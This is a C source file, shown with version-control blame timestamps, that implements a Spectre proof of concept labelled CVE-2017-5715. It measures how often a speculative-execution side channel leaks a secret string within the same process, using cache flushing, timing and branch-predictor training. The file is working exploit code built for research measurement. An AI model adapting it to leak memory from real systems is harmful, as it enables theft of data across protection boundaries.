2022-01-24 14:01:58 +01:00
|
|
|
|
/* spectre.c - CVE-2017-5715 user-to-user sucess rate measurement
|
|
|
|
|
|
*
|
|
|
|
|
|
* Borrows code from
|
|
|
|
|
|
* - https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6
|
|
|
|
|
|
* - https://github.com/genua/meltdown
|
|
|
|
|
|
*
|
|
|
|
|
|
* Copyright (c) 2022 Samuel AUBERTIN
|
|
|
|
|
|
*
|
|
|
|
|
|
* Permission to use, copy, modify, and distribute this software for any
|
|
|
|
|
|
* purpose with or without fee is hereby granted, provided that the above
|
|
|
|
|
|
* copyright notice and this permission notice appear in all copies.
|
|
|
|
|
|
*
|
|
|
|
|
|
* THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
|
|
|
|
|
|
* WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
|
|
|
|
|
|
* MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
|
|
|
|
|
|
* ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
|
|
|
|
|
|
* WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
|
|
|
|
|
|
* ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
|
|
|
|
|
|
* OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
|
|
|
|
|
|
*/
|
|
|
|
|
|
|
2022-01-22 15:04:17 +01:00
|
|
|
|
#include <stdio.h>
|
|
|
|
|
|
#include <stdlib.h>
|
|
|
|
|
|
#include <stdint.h>
|
|
|
|
|
|
#include <getopt.h>
|
|
|
|
|
|
#include <string.h>
|
|
|
|
|
|
#include <x86intrin.h> /* for rdtscp and clflush */
|
|
|
|
|
|
|
|
|
|
|
|
#if defined(__i386__) || defined(__amd64__)
|
|
|
|
|
|
#define CACHELINESIZE 64
|
|
|
|
|
|
static int _has_rdtscp;
|
|
|
|
|
|
#else
|
|
|
|
|
|
#error "unsupported architecture"
|
|
|
|
|
|
#endif
|
|
|
|
|
|
|
2022-01-23 19:37:24 +01:00
|
|
|
|
#define HAVE_RDTSCP (1U << 27)
|
2022-01-22 15:04:17 +01:00
|
|
|
|
|
|
|
|
|
|
char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
|
|
|
|
|
|
|
|
|
|
|
|
unsigned int array1_size = 16;
|
|
|
|
|
|
uint8_t unused1[64];
|
|
|
|
|
|
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
|
|
|
|
|
|
uint8_t unused2[64];
|
|
|
|
|
|
uint8_t array2[256 * 512];
|
|
|
|
|
|
uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */
|
|
|
|
|
|
unsigned cache_hit_threshold;
|
|
|
|
|
|
int verbose;
|
|
|
|
|
|
|
|
|
|
|
|
static inline unsigned
|
2022-01-23 19:37:24 +01:00
|
|
|
|
timed_access(
|
|
|
|
|
|
volatile uint8_t *addr
|
|
|
|
|
|
)
|
2022-01-22 15:04:17 +01:00
|
|
|
|
{
|
|
|
|
|
|
uint64_t t0, t1;
|
|
|
|
|
|
#pragma GCC diagnostic ignored "-Wuninitialized"
|
|
|
|
|
|
unsigned int junk = junk;
|
|
|
|
|
|
|
|
|
|
|
|
if (_has_rdtscp) {
|
|
|
|
|
|
t0 = __rdtscp(& junk);
|
|
|
|
|
|
junk |= *addr;
|
|
|
|
|
|
t1 = __rdtscp(& junk);
|
|
|
|
|
|
} else {
|
|
|
|
|
|
t0 = __rdtsc();
|
|
|
|
|
|
junk |= *addr;
|
|
|
|
|
|
t1 = __rdtsc();
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
return (unsigned)(t1 - t0);
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2022-01-23 19:37:24 +01:00
|
|
|
|
static inline void
|
|
|
|
|
|
native_cpuid(
|
|
|
|
|
|
unsigned int *eax,
|
|
|
|
|
|
unsigned int *ebx,
|
|
|
|
|
|
unsigned int *ecx,
|
|
|
|
|
|
unsigned int *edx
|
|
|
|
|
|
)
|
|
|
|
|
|
{
|
|
|
|
|
|
asm volatile("cpuid"
|
|
|
|
|
|
: "=a" (*eax),
|
|
|
|
|
|
"=b" (*ebx),
|
|
|
|
|
|
"=c" (*ecx),
|
|
|
|
|
|
"=d" (*edx)
|
|
|
|
|
|
: "0" (*eax), "2" (*ecx));
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2022-01-22 15:04:17 +01:00
|
|
|
|
static void
|
2022-01-23 19:37:24 +01:00
|
|
|
|
calibrate_threshold(
|
|
|
|
|
|
int verbose,
|
|
|
|
|
|
unsigned int *threshold
|
|
|
|
|
|
)
|
2022-01-22 15:04:17 +01:00
|
|
|
|
{
|
|
|
|
|
|
volatile char buf[2 * CACHELINESIZE];
|
|
|
|
|
|
volatile uint8_t *bufp;
|
|
|
|
|
|
int i;
|
|
|
|
|
|
const int cnt = 1000;
|
|
|
|
|
|
uint64_t tcache, tmem;
|
2022-01-23 19:37:24 +01:00
|
|
|
|
unsigned eax, ebx, ecx, edx;
|
|
|
|
|
|
__attribute__((unused)) volatile int junk = 0;
|
2022-01-22 15:04:17 +01:00
|
|
|
|
|
2022-01-23 19:37:24 +01:00
|
|
|
|
eax = 0x80000001; // Has RDTSCP ?
|
|
|
|
|
|
ecx = 0;
|
|
|
|
|
|
native_cpuid(&eax, &ebx, &ecx, &edx);
|
|
|
|
|
|
if (edx & HAVE_RDTSCP) {
|
|
|
|
|
|
switch (verbose) {
|
|
|
|
|
|
case 1:
|
|
|
|
|
|
fprintf(stderr, "CPU has RDTSCP.\n");
|
|
|
|
|
|
break;
|
|
|
|
|
|
case 2:
|
|
|
|
|
|
fprintf(stdout, "CPU has RDTSCP.\n");
|
|
|
|
|
|
break;
|
|
|
|
|
|
}
|
2022-01-22 15:04:17 +01:00
|
|
|
|
_has_rdtscp = 1;
|
|
|
|
|
|
} else {
|
2022-01-23 19:37:24 +01:00
|
|
|
|
switch (verbose) {
|
|
|
|
|
|
case 1:
|
|
|
|
|
|
fprintf(stderr, "WARNING: CPU has no RDTSCP support, using RDTSC.\n");
|
|
|
|
|
|
break;
|
|
|
|
|
|
case 2:
|
|
|
|
|
|
fprintf(stdout, "WARNING: CPU has no RDTSCP support, using RDTSC.\n");
|
|
|
|
|
|
break;
|
|
|
|
|
|
}
|
2022-01-22 15:04:17 +01:00
|
|
|
|
_has_rdtscp = 0;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINESIZE) &
|
|
|
|
|
|
~(CACHELINESIZE - 1)));
|
|
|
|
|
|
|
|
|
|
|
|
junk |= *bufp;
|
|
|
|
|
|
for (i = 0, tcache = 0; i < cnt; i++)
|
2022-01-23 19:37:24 +01:00
|
|
|
|
tcache += timed_access(bufp);
|
2022-01-22 15:04:17 +01:00
|
|
|
|
tcache /= cnt;
|
|
|
|
|
|
|
|
|
|
|
|
for (i = 0, tmem = 0; i < cnt; i++) {
|
|
|
|
|
|
_mm_clflush((const void *)bufp);
|
|
|
|
|
|
_mm_mfence();
|
2022-01-23 19:37:24 +01:00
|
|
|
|
tmem += timed_access(bufp);
|
2022-01-22 15:04:17 +01:00
|
|
|
|
}
|
|
|
|
|
|
tmem /= cnt;
|
|
|
|
|
|
if (threshold != NULL) {
|
|
|
|
|
|
*threshold = tcache + (tmem - tcache) / 2;
|
|
|
|
|
|
if (*threshold == (unsigned int)tmem)
|
|
|
|
|
|
(*threshold)--;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2022-01-23 19:37:24 +01:00
|
|
|
|
switch (verbose) {
|
|
|
|
|
|
case 1:
|
|
|
|
|
|
fprintf(stderr, "Access time: memory %lu, cache %lu", tmem, tcache);
|
|
|
|
|
|
if (threshold)
|
|
|
|
|
|
fprintf(stderr, " -> threshold %d", *threshold);
|
|
|
|
|
|
fprintf(stderr, "\n");
|
|
|
|
|
|
break;
|
|
|
|
|
|
case 2:
|
|
|
|
|
|
fprintf(stdout, "Access time: memory %lu, cache %lu", tmem, tcache);
|
|
|
|
|
|
if (threshold)
|
|
|
|
|
|
fprintf(stdout, " -> threshold %d", *threshold);
|
|
|
|
|
|
fprintf(stdout, "\n");
|
|
|
|
|
|
break;
|
2022-01-22 15:04:17 +01:00
|
|
|
|
}
|
|
|
|
|
|
return;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2022-01-23 19:37:24 +01:00
|
|
|
|
void
|
|
|
|
|
|
victim_function(
|
|
|
|
|
|
size_t x
|
|
|
|
|
|
)
|
|
|
|
|
|
{
|
2022-01-22 15:04:17 +01:00
|
|
|
|
if (x < array1_size) {
|
|
|
|
|
|
temp &= array2[array1[x] * 512];
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
void
|
|
|
|
|
|
leak(
|
2022-01-23 19:37:24 +01:00
|
|
|
|
size_t malicious_x,
|
|
|
|
|
|
uint8_t value[2],
|
|
|
|
|
|
int score[2],
|
|
|
|
|
|
unsigned cache_hit_threshold
|
2022-01-22 15:04:17 +01:00
|
|
|
|
)
|
|
|
|
|
|
{
|
|
|
|
|
|
static int results[256];
|
|
|
|
|
|
int tries, i, j, mix_i;
|
|
|
|
|
|
unsigned int junk = 0;
|
|
|
|
|
|
size_t training_x, x;
|
|
|
|
|
|
volatile uint8_t *addr;
|
|
|
|
|
|
|
|
|
|
|
|
for (i = 0; i < 256; i++)
|
|
|
|
|
|
results[i] = 0;
|
|
|
|
|
|
for (tries = 999; tries > 0; tries--) {
|
|
|
|
|
|
|
|
|
|
|
|
/* Flush array2[256*(0..255)] from cache */
|
|
|
|
|
|
for (i = 0; i < 256; i++)
|
|
|
|
|
|
_mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
|
|
|
|
|
|
|
|
|
|
|
|
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
|
|
|
|
|
|
training_x = tries % array1_size;
|
|
|
|
|
|
for (j = 29; j >= 0; j--) {
|
|
|
|
|
|
_mm_clflush(&array1_size);
|
|
|
|
|
|
for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
|
|
|
|
|
|
//_mm_mfence(); NOT WORKING
|
|
|
|
|
|
/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
|
|
|
|
|
|
/* Avoid jumps in case those tip off the branch predictor */
|
|
|
|
|
|
x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
|
|
|
|
|
|
x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
|
|
|
|
|
|
x = training_x ^ (x & (malicious_x ^ training_x));
|
|
|
|
|
|
/* Call the victim! */
|
|
|
|
|
|
victim_function(x);
|
|
|
|
|
|
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
/* Time reads. Order is lightly mixed up to prevent stride prediction */
|
|
|
|
|
|
for (i = 0; i < 256; i++) {
|
|
|
|
|
|
mix_i = ((i * 167) + 13) & 255;
|
|
|
|
|
|
addr = & array2[mix_i * 512];
|
2022-01-23 19:37:24 +01:00
|
|
|
|
if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size])
|
|
|
|
|
|
results[mix_i]++; /* cache hit - add +1 to score for this value */
|
2022-01-22 15:04:17 +01:00
|
|
|
|
}
|
|
|
|
|
|
|
2022-01-23 19:37:24 +01:00
|
|
|
|
/* Locate highest results in j */
|
2022-01-22 15:04:17 +01:00
|
|
|
|
j = -1;
|
|
|
|
|
|
for (i = 0; i < 256; i++) {
|
|
|
|
|
|
if (j < 0 || results[i] >= results[j]) {
|
|
|
|
|
|
j = i;
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
2022-01-23 19:37:24 +01:00
|
|
|
|
if (results[j] >= 3)
|
2022-01-22 15:04:17 +01:00
|
|
|
|
break;
|
|
|
|
|
|
}
|
2022-01-23 19:37:24 +01:00
|
|
|
|
|
2022-01-22 15:04:17 +01:00
|
|
|
|
results[0] ^= junk; /* use junk so code above won’t get optimized out*/
|
|
|
|
|
|
value[0] = (uint8_t) j;
|
|
|
|
|
|
score[0] = results[j];
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
int
|
2022-01-23 19:37:24 +01:00
|
|
|
|
main(
|
|
|
|
|
|
int argc,
|
|
|
|
|
|
char** argv
|
|
|
|
|
|
)
|
2022-01-22 15:04:17 +01:00
|
|
|
|
{
|
|
|
|
|
|
int o;
|
|
|
|
|
|
size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
|
|
|
|
|
|
int i, score[2], len = (int)strlen(secret);
|
|
|
|
|
|
uint8_t value[2];
|
2022-01-24 14:01:58 +01:00
|
|
|
|
unsigned successes = 0;
|
2022-01-22 15:04:17 +01:00
|
|
|
|
|
2022-01-23 19:37:24 +01:00
|
|
|
|
while ((o = getopt(argc, argv, "t:vc")) != EOF) {
|
2022-01-22 15:04:17 +01:00
|
|
|
|
switch (o) {
|
|
|
|
|
|
case 't':
|
|
|
|
|
|
cache_hit_threshold = atoi(optarg);
|
|
|
|
|
|
break;
|
|
|
|
|
|
case 'v':
|
|
|
|
|
|
verbose++;
|
2022-01-23 19:37:24 +01:00
|
|
|
|
break;
|
|
|
|
|
|
case 'c':
|
|
|
|
|
|
calibrate_threshold(2, &cache_hit_threshold);
|
|
|
|
|
|
return 0;
|
2022-01-22 15:04:17 +01:00
|
|
|
|
default:
|
|
|
|
|
|
usage:
|
2022-01-23 19:37:24 +01:00
|
|
|
|
fprintf(stderr, "usage: %s [-v] [-c] "
|
2022-01-24 14:01:58 +01:00
|
|
|
|
"[-t threshold]\n\t-v\t\tverbose\n"
|
|
|
|
|
|
"\t-c\t\tcalibrate only\n"
|
|
|
|
|
|
"\t-t\t\tfixed threshold, in milliseconds\n", argv[0]);
|
|
|
|
|
|
return 1;
|
2022-01-22 15:04:17 +01:00
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
if (argc != optind)
|
|
|
|
|
|
goto usage;
|
|
|
|
|
|
|
2022-01-23 19:37:24 +01:00
|
|
|
|
calibrate_threshold(verbose, cache_hit_threshold ? NULL : &cache_hit_threshold);
|
2022-01-22 15:04:17 +01:00
|
|
|
|
for (i = 0; i < (int)sizeof(array2); i++)
|
|
|
|
|
|
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
|
|
|
|
|
|
if(verbose) {
|
2022-01-23 19:37:24 +01:00
|
|
|
|
fprintf(stderr, "Leaking %d bytes using Branch Target Injection:\n", (int)strlen(secret));
|
2022-01-22 15:04:17 +01:00
|
|
|
|
}
|
|
|
|
|
|
while (--len >= 0) {
|
|
|
|
|
|
leak(malicious_x++, value, score, cache_hit_threshold);
|
|
|
|
|
|
if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
|
2022-01-24 14:01:58 +01:00
|
|
|
|
successes++;
|
2022-01-22 15:04:17 +01:00
|
|
|
|
fprintf(stderr, "\033[32m%c\033[0m", (value[0]));
|
|
|
|
|
|
} else {
|
|
|
|
|
|
fprintf(stderr, "\033[31m?\033[0m");
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
fprintf(stderr, "\n");
|
2022-01-24 14:01:58 +01:00
|
|
|
|
printf("%s:\tsuccess= %.0f %%\tthreshold= %d ms\n",
|
|
|
|
|
|
argv[0] + 2,
|
|
|
|
|
|
100 * successes / (float)strlen(secret), cache_hit_threshold);
|
2022-01-22 15:04:17 +01:00
|
|
|
|
|
|
|
|
|
|
return 0;
|
|
|
|
|
|
}
|
